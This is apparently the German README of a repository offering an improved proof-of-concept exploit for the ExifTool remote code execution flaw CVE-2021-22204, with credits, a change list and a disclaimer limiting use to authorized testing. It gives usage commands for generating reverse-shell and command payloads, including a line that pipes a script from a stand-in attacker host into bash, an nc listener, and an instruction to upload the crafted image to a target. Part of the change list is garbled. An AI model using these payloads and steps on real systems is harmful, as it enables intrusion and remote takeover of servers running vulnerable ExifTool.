
ExifTool RCE exploit (CVE-2021-22204) - verbesserte Version, keine exiftool-Abhängigkeit
Ein verbesserter Proof-of-Concept für CVE-2021-22204, eine Schwachstelle in ExifTool-Versionen 7.44 bis 12.23, die beliebige Codeausführung bei der Verarbeitung bösartiger DjVu-Dateien ermöglicht.
Dies ist abgeleitete Arbeit. Die Schwachstelle und der ursprüngliche Exploit stammen nicht von mir.
| Rolle | Wer |
|---|
| Schwachstelle entdeckt von | William Bowling (@wcbowling), gemeldet über das GitLab-Bug-Bounty-Programm — April 2021 |
| Original-PoC von | UNICORD (NicPWNs & Dev-Yeoj) |
| Änderungen in diesem Repository von | d4ytox |
Eine unzureichende Neutralisierung von Benutzerdaten im DjVu-Dateiformat in ExifTool-Versionen 7.44 bis 12.23 ermöglicht beliebige Codeausführung beim Parsen eines bösartigen Bildes. Dieser Exploit erzeugt eine bösartige Bilddatei, die bei Verarbeitung durch eine verwundbare ExifTool-Version vom Angreifer kontrollierten Code ausführt.
Aufbauend auf UNICORDev/exploit-CVE-2021-22204:
exiftool -config zum Einbetten der Payload, was fehlschlägt, wenn das eigene ExifTool gepatcht ist (v12.24+). Diese Version erstellt eine reine DjVu-Payload nur mit djvumake.\c-Escape-Sequenz)djvulibre-binDies sind technische Änderungen an einem bestehenden Exploit. Es wird keine Schwachstellenforschung beansprucht.
sudo apt install djvulibre-bin
Reverse Shell:
python3 exploit.py -s <LHOST> <LPORT>
Benutzerdefinierter Befehl:
python3 exploit.py -c "id > /tmp/pwned"
Beispiele:
# Reverse-Shell-Payload erzeugen
python3 exploit.py -s 192.168.1.100 4444
# Payload zur Befehlsausführung erzeugen
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"
# Listener starten und auf Rückmeldung warten
nc -nlvp 4444
Der Exploit erzeugt image.jpg - lade diese Datei auf ein Ziel hoch, wo ExifTool sie verarbeiten wird.
Dieses Tool wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Verwende diesen Exploit nur gegen Systeme, die dir gehören oder für die du eine ausdrückliche schriftliche Genehmigung zum Testen hast.
Unbefugter Zugriff auf Computersysteme ist illegal und strafbar. Verwende es verantwortungsvoll.
MIT, gültig nur für die Änderungen in diesem Repository. Der Upstream-PoC trägt keine Lizenz, daher bleiben alle Rechte bei seinen Autoren. Siehe LICENSE für den vollständigen Quellenhinweis.